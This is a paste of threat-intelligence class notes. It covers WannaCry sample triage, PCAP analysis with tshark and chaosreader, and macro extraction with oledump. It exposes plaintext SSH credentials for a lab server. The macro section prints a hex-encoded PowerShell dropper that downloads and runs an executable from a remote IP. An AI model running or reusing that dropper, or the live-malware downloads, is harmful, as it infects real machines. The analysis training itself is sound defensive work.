Advertisement
joemccray

Threat Intel

Nov 22nd, 2019
2,643
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.07 KB | None | 0 0
  1. ###################################
  2. # Fusion Cell/Threat Intelligence #
  3. ###################################
  4.  
  5.  
  6.  
  7.  
  8. Mission/Target
  9. --------------
  10. - External (company hired to do threat intel for you)
  11. - Generic keyword searches for terms that are relevant to your organization
  12.  
  13.  
  14. - Internal
  15. - Analyze indicators and artifacts, and distribute relevant info to appropriate business units
  16. - Analyze potential threat actors that may target your organization
  17.  
  18.  
  19.  
  20.  
  21. Technical Components
  22. --------------------
  23.  
  24. Data to analyze:
  25. - Feeds (who do you want listen to?)
  26. https://github.com/P3t3rp4rk3r/Threat_Intelligence#sources
  27.  
  28.  
  29. - Formats (what language do you want to speak)
  30. https://github.com/P3t3rp4rk3r/Threat_Intelligence#formats
  31.  
  32.  
  33. - Platforms
  34. - How do we talk to each other and other people (email, phone, postcard)
  35.  
  36. Open source platforms
  37. https://github.com/OpenCTI-Platform/opencti
  38.  
  39.  
  40. - Secure Linux OS (Quebes/Tails)
  41. Quebes/Tails
  42. https://www.fossmint.com/best-linux-distros-for-privacy-security/
  43.  
  44. - Non-Attrib network
  45. Purchase a seperate business internet connection
  46.  
  47.  
  48.  
  49.  
  50. Sample Reports
  51. --------------
  52. - Reports
  53. https://github.com/fdiskyou/threat-INTel
  54.  
  55.  
  56.  
  57. APT Research
  58. ------------
  59. https://github.com/aptnotes/data
  60. https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections
  61. https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/pubhtml#
  62.  
  63.  
  64.  
  65. Threat Analysts Online tools/dashboards
  66. ---------------------------------------
  67. https://start.me/p/rxRbpo/ti
  68.  
  69.  
  70.  
  71. ---------------------------------------------------------------------------------------------
  72.  
  73. - I prefer to use Putty to SSH into my Linux host.
  74. - You can download Putty from here:
  75. - http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
  76.  
  77. Here is the information to put into putty
  78.  
  79. Host Name: 149.28.201.171
  80. protocol: ssh
  81. port: 22
  82. username: cti
  83. password: I-love-CTI-123!
  84.  
  85. mkdir ~/yourname
  86.  
  87. cd ~/yourname
  88.  
  89. wget http://45.63.104.73/wannacry.zip
  90.  
  91. unzip wannacry.zip
  92. **** password is infected ***
  93.  
  94. file wannacry.exe
  95.  
  96. objdump -x wannacry.exe
  97.  
  98. strings wannacry.exe
  99.  
  100. strings wannacry.exe | grep -i dll
  101.  
  102. strings wannacry.exe | grep -i library
  103.  
  104. strings wannacry.exe | grep -i reg
  105.  
  106. strings wannacry.exe | grep -i key
  107.  
  108. strings wannacry.exe | grep -i rsa
  109.  
  110. strings wannacry.exe | grep -i open
  111.  
  112. strings wannacry.exe | grep -i get
  113.  
  114. strings wannacry.exe | grep -i mutex
  115.  
  116. strings wannacry.exe | grep -i irc
  117.  
  118. strings wannacry.exe | grep -i join
  119.  
  120. strings wannacry.exe | grep -i admin
  121.  
  122. strings wannacry.exe | grep -i list
  123. -----------------------------------------------------------------------
  124.  
  125.  
  126.  
  127. Reference:
  128. https://www.mcafee.com/blogs/other-blogs/executive-perspectives/analysis-wannacry-ransomware-outbreak/
  129.  
  130.  
  131.  
  132. 1. Read the advisory
  133. 2. Check Threat Intel Sites
  134. - https://www.threatminer.org/
  135. 3. Upload to sandbox (VirusTotal)
  136. 4. Upload to dynamic sandbox (https://hybrid-analysis.com/)
  137. 5. Upload PCAP to analysis platform (https://packettotal.com/)
  138.  
  139.  
  140.  
  141.  
  142. ###############################
  143. ----------- ############### # Threat Hunting on the wire # ############### -----------
  144. ###############################
  145.  
  146.  
  147.  
  148.  
  149. ##################################################################
  150. # Analyzing a PCAP Prads #
  151. # Note: run as regular user #
  152. ##################################################################
  153.  
  154. ---------------------------Type this as a regular user----------------------------------
  155. cd ~/yourname
  156.  
  157. mkdir pcap_analysis/
  158.  
  159. cd ~/yourname/pcap_analysis/
  160.  
  161. mkdir prads
  162.  
  163. cd ~/yourname/pcap_analysis/prads
  164.  
  165. wget http://45.63.104.73/suspicious-time.pcap
  166.  
  167. prads -r suspicious-time.pcap -l prads-asset.log
  168.  
  169. cat prads-asset.log | less
  170.  
  171. cat prads-asset.log | grep SYN | grep -iE 'windows|linux'
  172.  
  173. cat prads-asset.log | grep CLIENT | grep -iE 'safari|firefox|opera|chrome'
  174.  
  175. cat prads-asset.log | grep SERVER | grep -iE 'apache|linux|ubuntu|nginx|iis'
  176. -----------------------------------------------------------------------
  177.  
  178.  
  179.  
  180.  
  181. ##################################
  182. # PCAP Analysis with ChaosReader #
  183. # Note: run as regular user #
  184. ##################################
  185. ---------------------------Type this as a regular user----------------------------------
  186. cd ~/yourname
  187.  
  188. mkdir -p pcap_analysis/chaos_reader/
  189.  
  190. cd ~/pcap_analysis/chaos_reader/
  191.  
  192. wget http://45.63.104.73/suspicious-time.pcap
  193.  
  194. wget http://45.63.104.73/chaosreader.pl
  195.  
  196. perl chaosreader.pl suspicious-time.pcap
  197.  
  198. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
  199.  
  200. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
  201.  
  202.  
  203. for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u
  204.  
  205.  
  206.  
  207. for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u | awk '{print $5}' > url.lst
  208.  
  209.  
  210. wget https://raw.githubusercontent.com/Open-Sec/forensics-scripts/master/check-urls-virustotal.py
  211.  
  212.  
  213. python check-urls-virustotal.py url.lst
  214.  
  215.  
  216. ------------------------------------------------------------------------
  217.  
  218.  
  219.  
  220.  
  221.  
  222.  
  223.  
  224.  
  225. #############################
  226. # PCAP Analysis with tshark #
  227. # Note: run as regular user #
  228. #############################
  229. ---------------------------Type this as a regular user---------------------------------
  230. cd ~/yourname/pcap_analysis/
  231.  
  232. mkdir tshark
  233.  
  234. cd ~/yourname/pcap_analysis/tshark
  235.  
  236. wget http://45.63.104.73/suspicious-time.pcap
  237.  
  238. tshark -i ens3 -r suspicious-time.pcap -qz io,phs
  239.  
  240. tshark -r suspicious-time.pcap -qz ip_hosts,tree
  241.  
  242. tshark -r suspicious-time.pcap -Y "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq
  243.  
  244. tshark -r suspicious-time.pcap -Y "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
  245.  
  246.  
  247. tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
  248.  
  249. whois rapidshare.com.eyu32.ru
  250.  
  251. whois sploitme.com.cn
  252.  
  253. tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
  254.  
  255. tshark -r suspicious-time.pcap -qz http_req,tree
  256.  
  257. tshark -r suspicious-time.pcap -Y "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
  258.  
  259. tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
  260. ------------------------------------------------------------------------
  261.  
  262.  
  263. ###############################
  264. # Extracting files from PCAPs #
  265. # Note: run as regular user #
  266. ###############################
  267. ---------------------------Type this as a regular user---------------------------------
  268. cd ~/yourname/pcap_analysis/
  269.  
  270. mkdir extract_files
  271.  
  272. cd extract_files
  273.  
  274. wget http://45.63.104.73/suspicious-time.pcap
  275.  
  276. foremost -v -i suspicious-time.pcap
  277.  
  278. cd output
  279.  
  280. ls
  281.  
  282. cat audit.txt
  283.  
  284. cd exe
  285.  
  286. wget https://raw.githubusercontent.com/GREEKYnikhilsharma/Xen0ph0n-VirusTotal_API_Tool-Python3/master/vtlite.py
  287.  
  288. ******* NOTE: You will need to put your virustotal API key in vtlite.py *******
  289.  
  290. for f in *.exe; do python3 vtlite.py -s $f; done
  291. ---------------------------------------------------------------------------------------
  292.  
  293.  
  294.  
  295.  
  296.  
  297.  
  298.  
  299.  
  300.  
  301. ##############################################
  302. # Introduction to more sophisticated malware #
  303. ##############################################
  304.  
  305.  
  306. ---------------------------Type This-----------------------------------
  307. cd ~/yourname
  308.  
  309. mkdir vba_malware
  310.  
  311. cd vba_malware
  312.  
  313. wget https://infosecaddicts-files.s3.amazonaws.com/064016.zip
  314.  
  315. wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
  316.  
  317. unzip oledump_V0_0_22.zip
  318.  
  319. unzip 064016.zip
  320. infected
  321.  
  322. python oledump.py 064016.doc
  323.  
  324. python oledump.py 064016.doc -s A4 -v
  325. -----------------------------------------------------------------------
  326.  
  327.  
  328.  
  329. - From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
  330. - Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
  331.  
  332. ---------------------------Type This-----------------------------------
  333. python oledump.py 064016.doc -s A5 -v
  334. -----------------------------------------------------------------------
  335.  
  336. - As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
  337.  
  338. ---------------------------Type This-----------------------------------
  339. python oledump.py 064016.doc -s A3 -v
  340. -----------------------------------------------------------------------
  341.  
  342.  
  343. - Look for "GVhkjbjv" and you should see:
  344.  
  345. 636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
  346.  
  347. - Take that long blob that starts with 636D and finishes with 653B and paste it in:
  348. http://www.rapidtables.com/convert/number/hex-to-ascii.htm
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement